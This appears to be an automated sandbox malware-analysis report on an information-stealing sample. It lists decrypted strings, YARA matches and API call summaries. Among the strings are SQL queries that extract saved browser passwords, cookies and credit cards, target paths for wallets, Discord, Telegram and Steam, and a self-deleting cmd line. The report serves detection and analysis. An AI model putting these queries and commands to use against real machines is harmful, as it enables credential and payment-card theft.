                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RmStartSession
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RmRegisterResources
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RmGetList
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RmEndSession
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_open
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_step
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_column_text
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_finalize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_close
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3_column_blob
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: encrypted_key
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PATH
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: NSS_Init
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: NSS_Shutdown
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PK11_FreeSlot
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PK11_Authenticate
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: C:\ProgramData\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: browser:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: profile:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: url:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: login:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: password:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Opera
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: OperaGX
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Network
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: cookies
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: .txt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: TRUE
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: FALSE
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: autofill
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: history
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: name:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: month:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: year:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: card:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Cookies
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Login Data
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Web Data
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: History
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: logins.json
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: formSubmitURL
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: usernameField
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: encryptedUsername
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: encryptedPassword
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: guid
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: cookies.sqlite
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: formhistory.sqlite
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: places.sqlite
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: plugins
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Local Extension Settings
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Sync Extension Settings
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: IndexedDB
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Opera Stable
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Opera GX Stable
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CURRENT
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: chrome-extension_
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Local State
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: profiles.ini
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: chrome
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: opera
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: firefox
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: wallets
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ProductName
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ProcessorNameString
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DisplayName
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DisplayVersion
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Network Info:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - IP: IP?
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Country: ISO?
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: System Summary:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - HWID:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - OS:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Architecture:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - UserName:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Computer Name:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Local Time:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - UTC:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Language:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Keyboards:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Laptop:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Running Path:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - CPU:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Threads:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Cores:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - RAM:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - Display Resolution:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: - GPU:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: User Agents:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Installed Apps:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: All Users:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Current User:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Process List:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: system_info.txt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: freebl3.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: mozglue.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: msvcp140.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: nss3.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: softokn3.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: vcruntime140.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Temp\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: .exe
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: runas
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: open
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: /c start
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %DESKTOP%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %APPDATA%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %USERPROFILE%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %DOCUMENTS%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %PROGRAMFILES%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %RECENT%
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: *.lnk
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: files
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \discord\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Telegram Desktop\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: key_datas
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: map*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Telegram
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: *.tox
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: *.ini
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Password
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: 00000001
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: 00000002
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: 00000003
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: 00000004
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Pidgin
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \.purple\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: accounts.xml
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: token:
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Software\Valve\Steam
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SteamPath
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \config\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ssfn*
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: config.vdf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DialogConfig.vdf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: libraryfolders.vdf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: loginusers.vdf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Steam\
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sqlite3.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: browsers
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: done
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: soft
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: https
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: POST
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HTTP/1.1
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: hwid
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: build
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: token
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: file_name
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: file
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: message
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: screenshot.jpg
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00409540
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004155A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00406C10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_004094A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,1_2_0040BF90
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6BA66C80
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6BBBA9A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBB43B0 PK11_PubEncryptPKCS1,PR_SetError,1_2_6BBB43B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BF4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_00BF4280
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BF45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,3_2_00BF45A0

                              Exploits

                              barindex
                              Source: Yara matchFile source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: run.exe PID: 7780, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: run.exe PID: 7612, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeUnpacked PE file: 0.2.VucRf0jboS.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeUnpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack
                              Source: VucRf0jboS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 185.93.1.247:443 -> 192.168.2.4:49747 version: TLS 1.2
                              Source: Binary string: mozglue.pdbP source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
                              Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: nss3.pdb@ source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021792267.0000020EEAA70000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: FC:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: wntdll.pdb source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
